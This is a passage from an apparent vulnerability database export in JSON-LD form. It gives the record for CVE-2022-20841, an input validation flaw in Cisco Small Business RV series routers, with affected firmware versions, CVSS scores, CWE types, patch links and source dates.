        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-0323

    Vulnerability from variot - Updated: 2024-08-14 14:10

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Systems products, including RV160 VPN router firmware, RV160W Wireless-AC VPN router firmware, and RV260 VPN router firmware, contain vulnerabilities related to input validation. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-0323",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv345",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv260w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv340w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn \u30eb\u30fc\u30bf with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "cve": "CVE-2022-20841",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20841",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20841",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20841",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20841",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20841",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-2169",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Systems products, including RV160 VPN router firmware, RV160W Wireless-AC VPN router firmware, and RV260 VPN router firmware, contain vulnerabilities related to input validation. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result. \nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. \nThis advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20841",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.3837",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20841",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "id": "VAR-202208-0323",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-08-14T14:10:40.986000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-mult-vuln-CbVp4SUR",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "Fix for the input validation error vulnerability in Cisco Small Business RV Series Routers",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=204364"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Improper input validation (CWE-20) [NVD evaluation]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20841"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.3837"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-20841/"
          },
          {
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-10-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "date": "2022-08-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "date": "2022-08-10T08:15:07.317000",
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-10-11T05:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "date": "2022-08-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "date": "2023-11-07T03:43:06.027000",
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Input validation vulnerability in multiple Cisco Systems products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          }
        ],
        "trust": 0.6
      }
    }